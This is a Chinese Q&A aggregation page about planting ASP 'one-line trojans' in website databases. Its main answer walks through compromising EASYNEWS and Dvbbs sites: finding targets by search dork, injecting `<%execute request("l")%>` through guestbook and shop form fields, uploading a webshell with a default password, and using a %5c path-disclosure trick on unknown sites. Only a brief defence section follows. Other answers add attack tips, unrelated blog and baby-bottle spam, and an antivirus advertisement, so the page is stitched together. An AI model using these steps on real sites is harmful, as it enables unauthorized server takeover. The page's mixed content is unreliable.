当前位置:首页 » 操作系统 » 数据库一句话木马

数据库一句话木马

发布时间: 2022-02-23 16:09:53

A. 什么是一句话木马

一句话木马的使用

实例一:“一句话木马”入侵“EASYNEWS新闻管理系统”

“EASYNEWS新闻管理系统 v1.01 正式版”是在企业网站中非常常见的一套整站模版,在该网站系统的留言本组件中就存在着数据过滤不严漏洞,如果网站是默认路径和默认文件名安装的话,入侵者可以利用该漏洞直接上传ASP木马程序控制整个网站服务器。

Step1 搜索入侵目标

使用了“EASYNEWS新闻管理系统 v1.01 正式版”的网站,在网站页面的底部版权声明处,往往会有关键字符为“www.****.COM 版权所有”。只要在GOOGLE或网络中以该字符串为关键词进行搜索,就可以找到大量的入侵目标。

Step2 检测入侵条件

在这里,我们以网站“http://www.****.com/news/index.htm”为例进行一次入侵检测。“EASYNEWS新闻管理系统”网站的留言本数据库文件默认是位于“\ebook\db\ebook.asp”,首先在浏览器地址栏中输入“http://www.****.com/news/ebook/db/ebook.asp”,回车后在浏览器页面中将显示访问留言本数据库文件的返回信息。如果在页面中显示乱码,则说明该网站的留言本数据库文件没有改名,可以进行入侵。

Step3 在数据库中插入ASP后门

前面提到了该新闻系统的留言本插件存在过滤不严,因此我们可以通过提交发言,在数据库中插入“一句话木马”服务端代码:

在浏览器中访问“http://www.****.com/news/khly.htm”,打开提交留言页面。在提交页面中的“主页”栏中,直接填写“一句话木马”服务端代码,其它随便填写。确定后点击“发表留言”按钮,文章发表成功后,即可将“一句话木马”服务端代码插入到留言本数据库中了。

Step4 连接后门上传Webshell

由于留言本数据库文件“ebook.asp”是一个ASP文件,所以我们插入到数据库文件中的ASP语句将会被执行。将“一句话木马”客户端中的提交地址改为留言本数据库文件地址,然后用浏览器打开客户端,在上方的输入框中输入上传ASP木马的保存路径,在下面的输入框中可以粘贴入其它的ASP木马代码,这里选择的是桂林老兵网站管理助手ASP代码。点击提交按钮后,刚才粘贴的ASP木马将被写入到论坛服务器中保存。

Step5 打开WEBSHELL

上传的ASP木马被保存到与数据库文件同一WEB目录下,文件名为“temp.asp”,因此我们在IE浏览器中打开页面“http://www.****.com/news/ebook/db/temp.asp”,输入默认的密码“gxgl.com”,就可以看到一个WEBSHELL了。

在Webshell中可以上传其它的文件或者安装木马后门、执行各种命令等,网站的服务器已经掌握在我们的手中,可以为所欲为了。

实例二 “社区超市”入侵动网论坛

Step1 检测入侵条件

以入侵论坛“http://www.****.com/”为例。首先在浏览器地址栏中输入“http://www.****.com/data/shop.asp”,回车后在浏览器页面中将显示访问"shop.asp"文件的返回信息。说明该论坛的社区超市数据库文件没有改名或删除,可以进行入侵。

Step2 在数据库中插入ASP后门

登录论坛后,点击页面中的“娱乐”→“社区超市”,打开社区超市页面。在该页面中选择商店申请,打开“商店申请入驻”页面“http://www.****.com/z_shop_newshop.asp”,在页面中填写任意信息,注意在“商店招牌”栏中,添加刚才的ASP代码"〈%execute request("l")%〉"。确定后点击“申请”按钮进行提交,即可将ASP代码保存在数据库文件中了。

后面的步骤就与上面介绍的一样了,只需要用蓝屏木马连接数据库文件“http://sdoygb.w2.****.net/data/shop.asp”,然后上传WEBSHELL就可以控制论坛服务器了。

实例三 “一句话木马”入侵未知网站

从上面的两个例子,我们可以看出利用“一句话木马”入侵控制存在数据库过滤不严漏洞的网站,成功的前提是一定要知道网站的数据库地址。对于一些使用了未知网页程序的网站,我们如何才能找到它的数据库地址呢?这就要结合暴库或者跨站之类的方法了,下面只是结合一个简单的暴库,介绍一下利用一句话木马入侵未知网站的方法。

Step1 暴库得到数据库路径

以“http://bbs.****.com”为例。在浏览器中打开“http://bbs.****.com/join/listall.asp?bid=2”,将地址栏中join后的/改为%5c,在提交后的返回返回信息中可以看到网站数据库地址:“’d:\wwwroot\shuilong\wwwroot\admin\adshuilonG!#).asp’”,数据库文件名中加入了“#”符号,“#”符号在IE中执行时被解释为中断符,要访问该数据库文件则必须将“#”号变为“23%”才可以。因此数据库文件的实际WEB地址为“http://bbs.****.com/join/admin/adshuilonG!%23).asp”

Step2 注册网站,插入“一句话木马”

由于数据库文件是ASP文件格式的,满足入侵条件,因此现在我们需要将“一句话木马”插入到数据库文件中去。

在网页上点击注册网站按钮,打开注册链接“http://bbs.****.com/join/add.asp过滤了=step3&bid=3”,在资料填写页面处的站点名称或地址中写入“一句话木马”服务端代码,其它随便填写。然后点击完成按钮提交数据,木马服务端就被插入到数据库文件中了。

最后只需要用蓝屏木马连接数据库文件“http://bbs.****.com/join/admin/adshuilonG!%23).asp”,然后上传ASP木马就可以控制该网站的服务器了。

“一句话木马”的防范

要防范“一句话木马”可以从两方面进行,首先是要隐藏网站的数据库,不要让攻击者知道数据库文件的链接地址。这就需要管理员在网页程序中查被暴库漏洞,在数据库连接文件中加入容错代码等,具体的防暴库方法在这里就不作过多的讲解了。

其次就是要防止用户提交的数据未过滤漏洞,对用户提交的数据进行过滤,替换一些危险的代码等。例如中国站长联盟网站在出现该漏洞后已经对网页程序进行的修补,插入的ASP代码中的〈、〉和"等字符会被网页程序转换成其它字符,致使服务端代码无法正常执行。

只要作好这两方面的安全工作,“一句话木马”虽然无孔不入,但是面对这样的网站系统也是无可奈何的了。

B. 一句话木马 mdb+mssql数据库操作

sql的sa权限,还用来加数据库权限干什么呢,应该可以直接加用户啦,加了用户,如果开了3389,就可以直接远程了呀。

这加数据库用户···没看到过,加也不会加。

C. 请问要想用一句话木马拿到WEBSHELL是不是得知道其数据库地址啊

要用一句话`!
首先要把一句话木马插入页面中`!
就是所说的备份数据库`!
备份数据库后缀是asp或asa等`!
然后恢复数据库`!
用一句话木马连接页面连接`!
就出现一个小马``!
给你写大马的`!

D. 数据库 mssql 已经插入一句话木马,怎么使用一句话传木马在线等。

一句话木马的作用就是为了方便上传大马,直接上传你的WEBSHELL

E. 谁知道黑吧中级脚本入侵中的"数据库与一句话木马的完美结合"这一课所用到的blog系统是什么

博拉(Bolaa)是全球领先的跨平台博客网络,中国第一博客门户和口..
革新性的排气泡奶瓶系统,轻松消除残留食物 日康牌小双柄奶瓶,使宝宝吸奶更加顺畅 爱得利旋转把柄大奶瓶,无毒、无味...blog network,简称BBN博客组织,它由中国最优秀的博客组成。《IT新品博客报》由BBN旗下专业的IT产品博客共同写作,共同...

F. 没有数据库路径能使用一句话木马吗添加到留言地方后,用菜刀连不上,是不是用留言时候的路径还是什么

你的攻击方式叫做SQL注入,请查阅相关资料。

G. 一个网站注入了一句话木马后怎么看是在数据库的名称的啊

希望我的回答可以帮助楼主解决问题哦,我在这里十分不想给楼主泼凉水啊
我还是建议楼主不要轻易尝试木马,钓鱼网站的任何操作,这样不仅仅危害他人电脑,还会给自己的电脑同样带来病毒以及木马的危害可能,如果你曾经这样操作过的话还是先查杀病毒为妥,下面的方法给楼主参考
1.下载腾讯电脑管家-对电脑进行安全体检,并且打开所有防火墙避免系统其余文件的感染,防止病毒再次侵入,它是防御病毒的第一道防线,尤其重要
2.打开电脑管家-杀毒-闪电查杀/全盘查杀,记得在杀毒时要打开小红伞引擎。
3.为了更加安全,同样可以对电脑进行顽固木马的清理,方法很简单,打开电脑管家-工具箱-安全-顽固木马克星来进行顽固木马程序的清理
4.同时我也建议楼主哦,如果电脑存在系统高危漏洞时,电脑本身不安全是很容易感染病毒和木马的,建议用电脑管家来经常进行系统漏洞的修复,方法为打开电脑管家-修复漏洞-一键修复
5.最好在杀毒或是清理过木马以后尽量重启电脑,确保清除多余系统缓存文件,避免重复感染的问题产生。
6.平时也不要接陌生人发的文件和图片,里面很有可能加的木马病毒,对于危险网站建议也不要进入,里面也是有木马的。
以上我的回答供楼主参考解决问题,望采纳。

H. 一句话木马已经上传了,但数据库格式是mdb 怎么办

你能够将设数据库下载下来分析么?用到mdb数据库因该是asp的站点吧,直接上传asp小马到有执行权限的目录下访问就行了,不一定非要往数据库里面写东西。如果你把数据库后缀改成asp的,网站可能就打不开了。

I. 在不知道该网站数据库地址的情况下,用一句话木马入侵有用吗

一句话木马要写进一个文件/数据库,一般写进conn.asp文件 之后用中国菜刀连接一般都要进入后台操作

J. mysql数据库中能插一句话木马嘛

insert into 表名 values('木马')

热点内容
php7源码安装 发布:2024-12-24 21:38:10 浏览:903
linuxandroid 发布:2024-12-24 21:37:19 浏览:39
安卓手机不能自动锁屏怎么回事 发布:2024-12-24 21:37:08 浏览:865
脚本艾克 发布:2024-12-24 21:36:15 浏览:716
android单元测试studio 发布:2024-12-24 21:35:34 浏览:821
数控车床软件编程 发布:2024-12-24 21:26:16 浏览:525
如何对华为图库设置密码 发布:2024-12-24 21:16:20 浏览:501
scala反编译工具 发布:2024-12-24 21:03:26 浏览:770
安卓长按app怎么删除不了 发布:2024-12-24 20:57:44 浏览:718
加减乘除java 发布:2024-12-24 20:51:56 浏览:430